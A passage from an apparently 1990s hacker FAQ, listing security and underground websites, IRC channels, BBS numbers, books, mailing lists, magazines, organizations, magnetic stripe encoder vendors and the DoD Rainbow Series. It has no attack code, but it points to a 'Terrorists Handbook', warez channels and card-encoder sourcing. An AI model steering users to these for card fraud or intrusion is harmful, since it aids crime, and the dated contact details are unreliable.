  3992. http://www.c3.lanl.gov/~mcn                     (Lanl)
  3993. http://www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
  3994. http://www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
  3995. http://www.cpsr.org/home                        (CPSR)
  3996. http://www.cs.umd.edu/~lgas
  3997. http://www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (Security)
  3998. http://www.csd.harris.com/secure_info.html      (Harris)
  3999. http://www.csl.sri.com                          (SRI Computer Science Lab)
  4000. http://www.cygnus.com/data/cns.html             (Cygnus Network Security)
  4001. http://www.datafellows.fi                       (Data Fellows)
  4002. http://www.delmarva.com/raptor/raptor.html      (Raptor Eagle Network Isolator)
  4003. http://www.demon.co.uk/kbridge                  (KarlBridge)
  4004. http://www.digicash.com/ecash/ecash-home.html   (Digital Cash)
  4005. http://www.digital.com/info/key-secure-index.html(Digital Secure Systems)
  4006. http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html(Bugtraq)
  4007. http://www.eecs.nwu.edu/~jmyers/ids/index.html  (Intrusion Detection Systems)
  4008. http://www.engin.umich.edu/~jgotts/boxes.html   (Box info)
  4009. http://www.engin.umich.edu/~jgotts/hack-faq.html(This document)
  4010. http://www.engin.umich.edu/~jgotts/underground.html
  4011. http://www.ensta.fr/internet/unix/sys_admin     (System administration)
  4012. http://www.fc.net/defcon                        (DefCon)
  4013. http://www.greatcircle.com                      (Great Circle Associates)
  4014. http://www.hpcc.gov/blue94/section.4.6.html     (NSA)
  4015. http://www.ic.gov                               (The CIA)
  4016. http://www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
  4017. http://www.lysator.liu.se:7500/terror/thb_title.html (The Terrorists Handbook)
  4018. http://www.lysator.liu.se:7500/mit-guide/mit-guide.html (MIT Lockpicking Guide)
  4019. http://www.net23.com                            (Max Headroom)
  4020. http://www.nist.gov                             (NIST)
  4021. http://www.pacbell.com                          (Pacific Bell)
  4022. http://www.paranoia.com/mthreat                 (ToneLoc)
  4023. http://www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
  4024. http://www.phantom.com/~king                    (Taran King)
  4025. http://www.quadralay.com/www/Crypt/Crypt.html   (Quadralay Cryptography Archive)
  4026. http://www.research.att.com                     (AT&T)
  4027. http://www.rsa.com                              (RSA Data Security)
  4028. http://www.satelnet.org/~ccappuc
  4029. http://www.service.com/cm/uswest/usw1.html      (USWest)
  4030. http://www.shore.net/~oz/welcome.html           (Hack TV)
  4031. http://www.spy.org                              (Computer Systems Consulting)
  4032. http://www.sri.com                              (SRI)
  4033. http://www.tansu.com.au/Info/security.html      (Security Reference Index)
  4034. http://www.tis.com                              (Trusted Information Systems)
  4035. http://www.tri.sbc.com                          (Southwestern Bell)
  4036. http://www.uci.agh.edu.pl/pub/security          (Security)
  4037. http://www.umcc.umich.edu/~doug/virus-faq.html  (Virus)
  4038. http://www.wam.umd.edu/~ankh/Public/devil_does_unix
  4039. http://www.wiltel.com                           (Wiltel)
  4040. http://www.wired.com                            (Wired Magazine)
  4041.  
  4042.  
  4043. 06. What are some IRC channels of interest to hackers?
  4044.  
  4045. #2600
  4046. #cellular
  4047. #hack
  4048. #phreak
  4049. #linux
  4050. #root
  4051. #unix
  4052. #warez
  4053.  
  4054.  
  4055. 07. What are some BBS's of interest to hackers?
  4056.  
  4057. Hacker's Haven          (303)343-4053
  4058. Corrupt Sekurity        (303)753-1719
  4059. Independent Nation      (315)656-4179
  4060. underworld_1994.com     (514)683-1894
  4061. Digital Fallout         (516)378-6640
  4062. Alliance Communications (612)251-8596
  4063. Apocalypse 2000         (708)676-9855
  4064. K0dE Ab0dE              (713)579-2276
  4065. fARM R0Ad 666           (713)855-0261
  4066.  
  4067.  
  4068. 08. What books are available on this subject?
  4069.  
  4070.  
  4071. General Computer Security
  4072. ~~~~~~~~~~~~~~~~~~~~~~~~~
  4073. Computer Security Basics
  4074. Author: Deborah Russell and G.T. Gengemi Sr.
  4075. Publisher: O'Reilly & Associates, Inc.
  4076. Copyright Date: 1991
  4077. ISBN: 0-937175-71-4
  4078.  
  4079.     This is an excellent book.  It gives a broad overview of
  4080.     computer security without sacrificing detail.  A must read for
  4081.     the beginning security expert.
  4082.  
  4083. Computer Security Management
  4084. Author: Karen Forcht
  4085. Publisher: Boyd and Fraser
  4086. Copyright Date: 1994
  4087. ISBN: 0-87835-881-1
  4088.  
  4089. Information Systems Security
  4090. Author: Philip Fites and Martin Kratz
  4091. Publisher: Van Nostrad Reinhold
  4092. Copyright Date: 1993
  4093. ISBN: 0-442-00180-0
  4094.  
  4095. Computer Related Risks
  4096. Author: Peter G. Neumann
  4097. Publisher: Addison-Wesley
  4098. Copyright Date: 1995
  4099. ISBN: 0-201-55805-X
  4100.  
  4101. Computer Security Management
  4102. Author: Karen Forcht
  4103. Publisher: boyd & fraser publishing company
  4104. Copyright Date: 1994
  4105. ISBN: 0-87835-881-1
  4106.  
  4107.  
  4108. Unix System Security
  4109. ~~~~~~~~~~~~~~~~~~~~
  4110. Practical Unix Security
  4111. Author: Simson Garfinkel and Gene Spafford
  4112. Publisher: O'Reilly & Associates, Inc.
  4113. Copyright Date: 1991
  4114. ISBN: 0-937175-72-2
  4115.  
  4116.     Finally someone with a very firm grasp of Unix system security
  4117.     gets down to writing a book on the subject.  Buy this book.
  4118.     Read this book.
  4119.  
  4120. Firewalls and Internet Security
  4121. Author: William Cheswick and Steven Bellovin
  4122. Publisher: Addison Wesley
  4123. Copyright Date: 1994
  4124. ISBN: 0-201-63357-4
  4125.  
  4126. Unix System Security
  4127. Author: Rik Farrow
  4128. Publisher: Addison Wesley
  4129. Copyright Date: 1991
  4130. ISBN: 0-201-57030-0
  4131.  
  4132. Unix Security: A Practical Tutorial
  4133. Author: N. Derek Arnold
  4134. Publisher: McGraw Hill
  4135. Copyright Date: 1993
  4136. ISBN: 0-07-002560-6
  4137.  
  4138. Unix System Security: A Guide for Users and Systems Administrators
  4139. Author: David A. Curry
  4140. Publisher: Addison-Wesley
  4141. Copyright Date: 1992
  4142. ISBN: 0-201-56327-4
  4143.  
  4144. Unix System Security
  4145. Author: Patrick H. Wood and Stephen G. Kochan
  4146. Publisher: Hayden Books
  4147. Copyright Date: 1985
  4148. ISBN: 0-672-48494-3
  4149.  
  4150. Unix Security for the Organization
  4151. Author: Richard Bryant
  4152. Publisher: Sams
  4153. Copyright Date: 1994
  4154. ISBN: 0-672-30571-2
  4155.  
  4156.  
  4157. Network Security
  4158. ~~~~~~~~~~~~~~~~
  4159. Network Security Secrets
  4160. Author: David J. Stang and Sylvia Moon
  4161. Publisher: IDG Books
  4162. Copyright Date: 1993
  4163. ISBN: 1-56884-021-7
  4164.  
  4165.     Not a total waste of paper, but definitely not worth the
  4166.     $49.95 purchase price.  The book is a rehash of previously
  4167.     published information.  The only secret we learn from reading
  4168.     the book is that Sylvia Moon is a younger woman madly in love
  4169.     with the older David Stang.
  4170.  
  4171. Complete Lan Security and Control
  4172. Author: Peter Davis
  4173. Publisher: Windcrest / McGraw Hill
  4174. Copyright Date: 1994
  4175. ISBN: 0-8306-4548-9 and 0-8306-4549-7
  4176.  
  4177. Network Security
  4178. Author: Steven Shaffer and Alan Simon
  4179. Publisher: AP Professional
  4180. Copyright Date: 1994
  4181. ISBN: 0-12-638010-4
  4182.  
  4183.  
  4184. Cryptography
  4185. ~~~~~~~~~~~~
  4186. Applied Cryptography: Protocols, Algorithms, and Source Code in C
  4187. Author: Bruce Schneier
  4188. Publisher: John Wiley & Sons
  4189. Copyright Date: 1994
  4190. ISBN: 0-471-59756-2
  4191.  
  4192.     Bruce Schneier's book replaces all other texts on
  4193.     cryptography.  If you are interested in cryptography, this is
  4194.     a must read.  This may be the first and last book on
  4195.     cryptography you may ever need to buy.
  4196.  
  4197. Cryptography and Data Security
  4198. Author: Dorothy Denning
  4199. Publisher: Addison-Wesley Publishing Co.
  4200. Copyright Date: 1982
  4201. ISBN: 0-201-10150-5
  4202.  
  4203. Protect Your Privacy: A Guide for PGP Users
  4204. Author: William Stallings
  4205. Publisher: Prentice-Hall
  4206. Copyright Date: 1994
  4207. ISBN: 0-13-185596-4
  4208.  
  4209.  
  4210. Programmed Threats
  4211. ~~~~~~~~~~~~~~~~~~
  4212. The Little Black Book of Computer Viruses
  4213. Author: Mark Ludwig
  4214. Publisher: American Eagle Publications
  4215. Copyright Date: 1990
  4216. ISBN: 0-929408-02-0
  4217.  
  4218.     The original, and still the best, book on computer viruses.
  4219.     No media hype here, just good clean technical information.
  4220.  
  4221. Computer Viruses, Artificial Life and Evolution
  4222. Author: Mark Ludwig
  4223. Publisher: American Eagle Publications
  4224. Copyright Date: 1993
  4225. ISBN: 0-929408-07-1
  4226.  
  4227. Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
  4228.     Threats to Your System
  4229. Author: John McAfee and Colin Haynes
  4230. Publisher: St. Martin's Press
  4231. Copyright Date: 1989
  4232. ISBN: 0-312-03064-9 and 0-312-02889-X
  4233.  
  4234. The Virus Creation Labs: A Journey Into the Underground
  4235. Author: George Smith
  4236. Publisher: American Eagle Publications
  4237. Copyright Date: 1994
  4238. ISBN:
  4239.  
  4240.  
  4241. Telephony
  4242. ~~~~~~~~~
  4243. Engineering and Operations in the Bell System
  4244. Author: R.F. Rey
  4245. Publisher: Bell Telephont Laboratories
  4246. Copyright Date: 1983
  4247. ISBN: 0-932764-04-5
  4248.  
  4249.         Although hopelessly out of date, this book remains *THE* book
  4250.         on telephony.  This book is 100% Bell, and is loved by phreaks
  4251.         the world over.
  4252.  
  4253. Telephony: Today and Tomorrow
  4254. Author: Dimitris N. Chorafas
  4255. Publisher: Prentice-Hall
  4256. Copyright Date: 1984
  4257. ISBN: 0-13-902700-9
  4258.  
  4259. The Telecommunications Fact Book and Illustrated Dictionary
  4260. Author: Ahmed S. Khan
  4261. Publisher: Delmar Publishers, Inc.
  4262. Copyright Date: 1992
  4263. ISBN: 0-8273-4615-8
  4264.  
  4265.         I find this dictionary to be an excellent reference book on
  4266.         telephony, and I recommend it to anyone with serious
  4267.         intentions in the field.
  4268.  
  4269.  
  4270. Hacking History and Culture
  4271. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4272. The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  4273. Author: Bruce Sterling
  4274. Publisher: Bantam Books
  4275. Copyright Date: 1982
  4276. ISBN: 0-553-56370-X
  4277.  
  4278.     Bruce Sterling has recently released the book FREE to the net.
  4279.     The book is much easier to read in print form, and the
  4280.     paperback is only $5.99.  Either way you read it, you will be
  4281.     glad you did.  Mr. Sterling is an excellent science fiction
  4282.     author and has brought his talent with words to bear on the
  4283.     hacking culture.  A very enjoyable reading experience.
  4284.  
  4285. Cyberpunk
  4286. Author: Katie Hafner and John Markoff
  4287. Publisher: Simon and Schuster
  4288. Copyright Date: 1991
  4289. ISBN: 0-671-77879-X
  4290.  
  4291. The Cuckoo's Egg
  4292. Author: Cliff Stoll
  4293. Publisher: Simon and Schuster
  4294. Copyright Date: 1989
  4295. ISBN: 0-671-72688-9
  4296.  
  4297. Hackers: Heroes of the Computer Revolution
  4298. Author: Steven Levy
  4299. Publisher: Doubleday
  4300. Copyright Date: 1984
  4301. ISBN: 0-440-13495-6
  4302.  
  4303.  
  4304. Unclassified
  4305. ~~~~~~~~~~~~
  4306. The Hacker's Handbook
  4307. Author: Hugo Cornwall
  4308. Publisher: E. Arthur Brown Company
  4309. Copyright Date:
  4310. ISBN: 0-912579-06-4
  4311.  
  4312. Secrets of a Super Hacker
  4313. Author: The Knightmare
  4314. Publisher: Loompanics
  4315. Copyright Date: 1994
  4316. ISBN: 1-55950-106-5
  4317.  
  4318.     The Knightmare is no super hacker.  There is little or no real
  4319.     information in this book.  The Knightmare gives useful advice
  4320.     like telling you not to dress up before going trashing.
  4321.     The Knightmare's best hack is fooling Loompanics into
  4322.     publishing this garbage.
  4323.  
  4324. The Day The Phones Stopped
  4325. Author: Leonard Lee
  4326. Publisher: Primus / Donald I Fine, Inc.
  4327. Copyright Date: 1992
  4328. ISBN: 1-55611-286-6
  4329.  
  4330.     Total garbage.  Paranoid delusions of a lunatic.  Less factual
  4331.     data that an average issue of the Enquirer.
  4332.  
  4333. Information Warfare
  4334. Author: Winn Swartau
  4335. Publisher: Thunder Mountain Press
  4336. Copyright Date: 1994
  4337. ISBN: 1-56025-080-1
  4338.  
  4339. An Illustrated Guide to the Techniques and Equipment of Electronic Warfare
  4340. Author: Doug Richardson
  4341. Publisher: Salamander Press
  4342. Copyright Date:
  4343. ISBN: 0-668-06497-8
  4344.  
  4345.  
  4346. 09. What are some mailing lists of interest to hackers?
  4347.  
  4348. Academic Firewalls
  4349. Reflector Address:
  4350. Registration Address: Send a message to majordomo@greatcircle.com
  4351.                       containing the line "subscribe firewalls user@host"
  4352.  
  4353. Bugtraq
  4354. Reflector Address:    bugtraq@crimelab.com
  4355. Registration Address: bugtraq-request@crimelab.com
  4356.  
  4357. Cert Tools
  4358. Reflector Address:    cert-tools@cert.org
  4359. Registration Address: cert-tools-request@cert.org
  4360.  
  4361. Computers and Society
  4362. Reflector Address:    Comp-Soc@limbo.intuitive.com
  4363. Registration Address: taylor@limbo.intuitive.com
  4364.  
  4365. Coordinated Feasibility Effort to Unravel State Data
  4366. Reflector Address:    ldc-sw@cpsr.org
  4367. Registration Address:
  4368.  
  4369. CPSR Announcement List
  4370. Reflector Address:    cpsr-announce@cpsr.org
  4371. Registration Address:
  4372.  
  4373. CPSR - Intellectual Property
  4374. Reflector Address:    cpsr-int-prop@cpsr.org
  4375. Registration Address:
  4376.  
  4377. CPSR - Internet Library
  4378. Reflector Address:    cpsr-library@cpsr.org
  4379. Registration Address:
  4380.  
  4381. DefCon Announcement List
  4382. Reflector Address:
  4383. Registration Address: Send a message to majordomo@fc.net containing
  4384.                       the line "subscribe dc-announce"
  4385.  
  4386. DefCon Chat List
  4387. Reflector Address:
  4388. Registration Address: Send a message to majordomo@fc.net containing
  4389.                       the line "subscribe dc-stuff"
  4390.  
  4391. Macintosh Security
  4392. Reflector Address:    mac-security@eclectic.com
  4393. Registration Address: mac-security-request@eclectic.com
  4394.  
  4395. NeXT Managers
  4396. Reflector Address:
  4397. Registration Address: next-managers-request@stolaf.edu
  4398.  
  4399. Phiber-Seream
  4400. Reflector Address:
  4401. Registration Address: Send a message to listserv@netcom.com
  4402.                       containing the line "subscribe phiber-scream user@host"
  4403.  
  4404. rfc931-users
  4405. Reflector Address:    rfc931-users@kramden.acf.nyu.edu
  4406. Registration Address: brnstnd@nyu.edu
  4407.  
  4408. RSA Users
  4409. Reflector Address:    rsaref-users@rsa.com
  4410. Registration Address: rsaref-users-request@rsa.com
  4411.  
  4412.  
  4413. 10. What are some print magazines of interest to hackers?
  4414.  
  4415. 2600 - The Hacker Quarterly
  4416. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4417. E-mail address: 2600@well.sf.ca.us
  4418.  
  4419. Subscription Address: 2600 Subscription Dept
  4420.                       PO Box 752
  4421.                       Middle Island, NY  11953-0752
  4422.  
  4423. Letters and article submission address: 2600 Editorial Dept
  4424.                                         PO Box 99
  4425.                                         Middle Island, NY  11953-0099
  4426.  
  4427. Subscriptions: United States: $21/yr individual, $50 corporate.
  4428.                Overseas: $30/yr individual, $65 corporate.
  4429.  
  4430.  
  4431. Gray Areas
  4432. ~~~~~~~~~~
  4433. Gray Areas examines gray areas of law and morality and subject matter
  4434. which is illegal, immoral and/oe controversial. Gray Areas explores
  4435. why hackers hack and puts hacking into a sociological framework of
  4436. deviant behavior.
  4437.  
  4438. E-Mail Address: grayarea@well.sf.ca.us
  4439. E-Mail Address: grayarea@netaxs.com
  4440.  
  4441. U.S. Mail Address: Gray Areas
  4442.                    PO Box 808
  4443.                    Broomall, PA 19008
  4444.  
  4445. Subscriptions: $26.00 4 issues first class
  4446.                $34.00 4 issues foreign (shipped air mail)
  4447.  
  4448.  
  4449. Wired
  4450. ~~~~~
  4451. Subscription Address: subscriptions@wired.com
  4452.                   or: Wired
  4453.                       PO Box 191826
  4454.                       San Francisco, CA 94119-9866
  4455.  
  4456. Letters and article submission address: guidelines@wired.com
  4457.                                     or: Wired
  4458.                                         544 Second Street
  4459.                                         San Francisco, CA 94107-1427
  4460.  
  4461. Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
  4462.  
  4463.  
  4464. Nuts & Volts
  4465. ~~~~~~~~~~~~
  4466. T& L Publications
  4467. 430 Princeland Court
  4468. Corona, CA 91719
  4469. (800)783-4624 (Voice) (Subscription Only Order Line)
  4470. (909)371-8497 (Voice)
  4471. (909)371-3052 (Fax)
  4472. CIS: 74262,3664
  4473.  
  4474.  
  4475. 11. What are some organizations of interest to hackers?
  4476.  
  4477. Computer Professionals for Social Responsibility (CPSR)
  4478. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4479. CPSR empowers computer professionals and computer users to advocate
  4480. for the responsible use of information technology and empowers all who
  4481. use computer technology to participate in the public debate.   As
  4482. technical experts, CPSR members provide the public and policymakers
  4483. with realistic assessments of the power, promise, and limitations of
  4484. computer technology.  As an organization of concerned citizens, CPSR
  4485. directs public attention to critical choices concerning the
  4486. applications of computing and how those choices affect society.
  4487.  
  4488. By matching unimpeachable technical information with policy
  4489. development savvy, CPSR uses minimum dollars to have maximum impact
  4490. and encourages broad public participation in the shaping of technology
  4491. policy.
  4492.  
  4493. Every project we undertake is based on five principles:
  4494.  
  4495. *  We foster and support public discussion of and public
  4496.    responsibility for decisions involving the use of computers in
  4497.    systems critical to society.
  4498.  
  4499. *  We work to dispel popular myths about the infallibility of
  4500.    technological systems.
  4501.  
  4502. *  We challenge the assumption that technology alone can solve
  4503.    political and social problems.
  4504.  
  4505. *  We critically examine social and technical issues within the
  4506.    computer profession, nationally and internationally.
  4507.  
  4508. *  We encourage the use of computer technology to improve the quality
  4509.    of life.
  4510.  
  4511. CPSR Membership Categories
  4512.   75  REGULAR MEMBER
  4513.   50  Basic member
  4514.  200  Supporting member
  4515.  500  Sponsoring member
  4516. 1000  Lifetime member
  4517.   20  Student/low income member
  4518.   50  Foreign subscriber
  4519.   50  Library/institutional subscriber
  4520.  
  4521. CPSR National Office
  4522. P.O. Box 717
  4523. Palo Alto, CA  94301
  4524. 415-322-3778
  4525. 415-322-3798 (FAX)
  4526. E-mail: cpsr@csli.stanford.edu
  4527.  
  4528.  
  4529. Electronic Frontier Foundation (EFF)
  4530. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4531. The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
  4532. of policies and activities that will advance freedom and openness in
  4533. computer-based communications. It is a member-supported, nonprofit
  4534. group that grew from the conviction that a new public interest
  4535. organization was needed in the information age; that this organization
  4536. would enhance and protect the democratic potential of new computer
  4537. communications technology. From the beginning, the EFF determined to
  4538. become an organization that would combine technical, legal, and public
  4539. policy expertise, and would apply these skills to the myriad issues
  4540. and concerns that arise whenever a new communications medium is born.
  4541.  
  4542. Memberships are $20.00 per year for students, $40.00 per year for
  4543. regular members, and $100.00 per year for organizations.
  4544.  
  4545. The Electronic Frontier Foundation, Inc.
  4546. 666 Pennsylvania Avenue S.E., Suite 303
  4547. Washington, D.C.  20003
  4548. +1 202 544 9237
  4549. +1 202 547 5481 FAX
  4550. Internet: eff@eff.org
  4551.  
  4552.  
  4553. Free Software Foundation (FSF)
  4554. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4555.  
  4556.  
  4557. GNU
  4558. ~~~
  4559.  
  4560.  
  4561. The League for Programming Freedom (LPF)
  4562. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4563. The League for Programming Freedom is an organization of people who
  4564. oppose the attempt to monopolize common user interfaces through "look
  4565. and feel" copyright lawsuits.  Some of us are programmers, who worry
  4566. that such monopolies will obstruct our work.  Some of us are users,
  4567. who want new computer systems to be compatible with the interfaces we
  4568. know.  Some are founders of hardware or software companies, such as
  4569. Richard P. Gabriel. Some of us are professors or researchers,
  4570. including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
  4571. Boyer and Patrick Winston.
  4572.  
  4573. "Look and feel" lawsuits aim to create a new class of government-
  4574. enforced monopolies broader in scope than ever before.  Such a system
  4575. of user-interface copyright would impose gratuitous incompatibility,
  4576. reduce competition, and stifle innovation.
  4577.  
  4578. We in the League hope to prevent these problems by preventing
  4579. user-interface copyright.  The League is NOT opposed to copyright law
  4580. as it was understood until 1986 -- copyright on particular programs.
  4581. Our aim is to stop changes in the copyright system which would take
  4582. away programmers' traditional freedom to write new programs compatible
  4583. with existing programs and practices.
  4584.  
  4585. Annual dues for individual members are $42 for employed professionals,
  4586. $10.50 for students, and $21 for others.  We appreciate activists, but
  4587. members who cannot contribute their time are also welcome.
  4588.  
  4589. To contact the League, phone (617) 243-4091, send Internet mail to the
  4590. address league@prep.ai.mit.edu, or write to:
  4591.  
  4592. League for Programming Freedom
  4593. 1 Kendall Square #143
  4594. P.O. Box 9171
  4595. Cambridge, MA 02139 USA
  4596.  
  4597.  
  4598. SotMesc
  4599. ~~~~~~~
  4600. Founded in 1989, SotMesc is dedicated to preserving the integrity and
  4601. cohesion of the computing society.  By promoting computer education,
  4602. liberties and efficiency, we believe we can secure freedoms for all
  4603. computer users while retaining privacy.
  4604.  
  4605. SotMesc maintains the CSP Internet mailing list, the SotMesc
  4606. Scholarship Fund, and the SotMesc Newsletter.
  4607.  
  4608. The SotMESC is financed partly by membership fees, and donations, but
  4609. mostly by selling hacking, cracking, phreaking, electronics, internet,
  4610. and virus information and programs on disk and bound paper media.
  4611.  
  4612. SotMesc memberships are $20 to students and $40 to regular members.
  4613.  
  4614. SotMESC
  4615. P.O. Box 573
  4616. Long Beach, MS  39560
  4617.  
  4618.  
  4619. Computer Emergency Response Team (CERT
  4620. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4621.  
  4622. CERT is the Computer Emergency Response Team that was formed by the
  4623. Defense Advanced Research Projects Agency (DARPA) in November 1988 in
  4624. response to the needs exhibited during the Internet worm incident.
  4625. The CERT charter is to work with the Internet community to facilitate
  4626. its response to computer security events involving Internet hosts, to
  4627. take proactive steps to raise the community's awareness of computer
  4628. security issues, and to conduct research targeted at improving the
  4629. security of existing systems.
  4630.  
  4631. CERT products and services include 24-hour technical assistance for
  4632. responding to computer security incidents, product vulnerability
  4633. assistance, technical documents, and seminars.  In addition, the team
  4634. maintains a number of mailing lists (including one for CERT
  4635. advisories) and provides an anonymous FTP server:  cert.org
  4636. (192.88.209.5), where security-related documents, past CERT
  4637. advisories, and tools are archived.
  4638.  
  4639. CERT contact information:
  4640.  
  4641. U.S. mail address
  4642.   CERT Coordination Center
  4643.   Software Engineering Institute
  4644.   Carnegie Mellon University
  4645.   Pittsburgh, PA 15213-3890
  4646.   U.S.A.
  4647.  
  4648. Internet E-mail address
  4649.   cert@cert.org
  4650.  
  4651. Telephone number
  4652.   +1 412-268-7090 (24-hour hotline)
  4653.     CERT Coordination Center personnel answer
  4654.     7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
  4655.     emergencies during other hours.
  4656.  
  4657. FAX number
  4658.   +1 412-268-6989
  4659.  
  4660.  
  4661. 12. Where can I purchase a magnetic stripe encoder/decoder?
  4662.  
  4663. CPU Advance
  4664. PO Box 2434
  4665. Harwood Station
  4666. Littleton, MA  01460
  4667. (508)624-4819 (Fax)
  4668.  
  4669. Omron Electronics, Inc.
  4670. One East Commerce Drive
  4671. Schaumburg, IL  60173
  4672. (800)556-6766 (Voice)
  4673. (708)843-7787 (Fax)
  4674.  
  4675. Security Photo Corporation
  4676. 1051 Commonwealth Avenue
  4677. Boston, MA 02215
  4678. (800)533-1162 (Voice)
  4679. (617)783-3200 (Voice)
  4680. (617)783-1966 (Voice)
  4681.  
  4682. Timeline Inc,
  4683. 23605 Telo Avenue
  4684. Torrence, CA 90505
  4685. (800)872-8878 (Voice)
  4686. (800)223-9977 (Voice)
  4687.  
  4688.  
  4689. 13. What are the rainbow books and how can I get them?
  4690.  
  4691. Orange Book
  4692. DoD 5200.28-STD
  4693. Department of Defense Trusted Computer System Evaluation Criteria
  4694.  
  4695. Green Book
  4696. CSC-STD-002-85
  4697. Department of Defense Password Management Guideline
  4698.  
  4699. Yellow Book
  4700. CSC-STD-003-85
  4701. Computer Security Requirements -- Guidance for Applying the Department
  4702. of Defense Trusted Computer System Evaluation Criteria in Specific
  4703. Environments
  4704.  
  4705. Yellow Book
  4706. CSC-STD-004-85
  4707. Technical Rationale Behind CSC-STD-003-85: Computer Security
  4708. Requirements.  Guidance for Applying the Department of Defense Trusted
  4709. Computer System Evaluation Criteria in Specific Environments.
  4710.  
  4711. Tan Book
  4712. NCSC-TG-001
  4713. A Guide to Understanding Audit in Trusted Systems
  4714.  
  4715. Bright Blue Book
  4716. NCSC-TG-002
  4717. Trusted Product Evaluation - A Guide for Vendors
  4718.  
  4719. Neon Orange Book
  4720. NCSC-TG-003
  4721. A Guide to Understanding Discretionary Access Control in Trusted
  4722. Systems
  4723.  
  4724. Teal Green Book
  4725. NCSC-TG-004
  4726. Glossary of Computer Security Terms
  4727.  
  4728. Red Book
  4729. NCSC-TG-005
  4730. Trusted Network Interpretation of the Trusted Computer System
  4731. Evaluation Criteria
  4732.  
  4733. Orange Book
  4734. NCSC-TG-006
  4735. A Guide to Understanding Configuration Management in Trusted Systems
  4736.  
  4737. Burgundy Book
  4738. NCSC-TG-007
  4739. A Guide to Understanding Design Documentation in Trusted Systems
  4740.  
  4741. Dark Lavender Book
  4742. NCSC-TG-008
  4743. A Guide to Understanding Trusted Distribution in Trusted Systems
  4744.  
  4745. Venice Blue Book
  4746. NCSC-TG-009
  4747. Computer Security Subsystem Interpretation of the Trusted Computer
  4748. System Evaluation Criteria
  4749.  
  4750. Aqua Book
  4751. NCSC-TG-010
  4752. A Guide to Understanding Security Modeling in Trusted Systems
  4753.  
  4754. Dark Red Book
  4755. NCSC-TG-011
  4756. Trusted Network Interpretation Environments Guideline -- Guidance for
  4757. Applying the Trusted Network Interpretation
  4758.  
  4759. Pink Book
  4760. NCSC-TG-013
  4761. Rating Maintenance Phase -- Program Document
  4762.  
  4763. Purple Book
  4764. NCSC-TG-014
  4765. Guidelines for Formal Verification Systems
  4766.  
  4767. Brown Book
  4768. NCSC-TG-015
  4769. A Guide to Understanding Trusted Facility Management
  4770.  
  4771. Yellow-Green Book
  4772. NCSC-TG-016
  4773. Guidelines for Writing Trusted Facility Manuals
  4774.  
  4775. Light Blue
  4776. NCSC-TG-017
  4777. A Guide to Understanding Identification and Authentication in Trusted
  4778. Systems
  4779.  
  4780. Light Blue Book
  4781. NCSC-TG-018
  4782. A Guide to Understanding Object Reuse in Trusted Systems
  4783.  
  4784. Blue Book
  4785. NCSC-TG-019
  4786. Trusted Product Evaluation Questionnaire
  4787.  
  4788. Gray Book
  4789. NCSC-TG-020A
  4790. Trusted Unix Working Group (TRUSIX) Rationale for Selecting
  4791. Access Control List Features for the Unix System
  4792.  
  4793. Lavender Book
  4794. NCSC-TG-021
  4795. Trusted Data Base Management System Interpretation of the Trusted
  4796. Computer System Evaluation Criteria
  4797.  
  4798. Yellow Book
  4799. NCSC-TG-022
  4800. A Guide to Understanding Trusted Recovery in Trusted Systems
  4801.  
  4802. Bright Orange Book
  4803. NCSC-TG-023
  4804. A Guide to Understandng Security Testing and Test Documentation in
  4805. Trusted Systems
  4806.  
  4807. Purple Book
  4808. NCSC-TG-024  (Volume 1/4)
  4809. A Guide to Procurement of Trusted Systems: An Introduction to
  4810. Procurement Initiators on Computer Security Requirements
  4811.  
  4812. Purple Book
  4813. NCSC-TG-024 (Volume 2/4)
  4814. A Guide to Procurement of Trusted Systems: Language for RFP
  4815. Specifications and Statements of Work - An Aid to Procurement
  4816. Initiators
  4817.  
  4818. Purple Book
  4819. NCSC-TG-024  (Volume 3/4)
  4820. A Guide to Procurement of Trusted Systems: Computer Security Contract
  4821. Data Requirements List and Data Item Description Tutorial
  4822.  
  4823. +Purple Book
  4824. +NCSC-TG-024  (Volume 4/4)
  4825. +A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
  4826. +Proposal Document - An Aid to Procurement Initiators and Contractors
  4827.  
  4828. Green Book
  4829. NCSC-TG-025
  4830. A Guide to Understanding Data Remanence in Automated Information
  4831. Systems
  4832.  
  4833. Hot Peach Book
  4834. NCSC-TG-026
  4835. A Guide to Writing the Security Features User's Guide for Trusted Systems
  4836.  
  4837. Turquiose Book
  4838. NCSC-TG-027
  4839. A Guide to Understanding Information System Security Officer
  4840. Responsibilities for Automated Information Systems
  4841.  
  4842. Violet Book
  4843. NCSC-TG-028
  4844. Assessing Controlled Access Protection
  4845.  
  4846. Blue Book
  4847. NCSC-TG-029
  4848. Introduction to Certification and Accreditation
  4849.  
  4850. Light Pink Book
  4851. NCSC-TG-030
  4852. A Guide to Understanding Covert Channel Analysis of Trusted Systems
  4853.  
  4854. C1 Technical Report-001
  4855. Computer Viruses: Prevention, Detection, and Treatment
  4856.  
  4857. *C Technical Report 79-91
  4858. *Integrity in Automated Information Systems
  4859.  
  4860. *C Technical Report 39-92
  4861. *The Design and Evaluation of INFOSEC systems: The Computer Security
  4862. *Contributions to the Composition Discussion
  4863.  
  4864. NTISSAM COMPUSEC/1-87
  4865. Advisory Memorandum on Office Automation Security Guideline
  4866.  
  4867. --
  4868.  
  4869. You can get your own free copy of any or all of the books by writing
  4870. or calling:
  4871.  
  4872.        INFOSEC Awareness Division
  4873.        ATTN: X711/IAOC
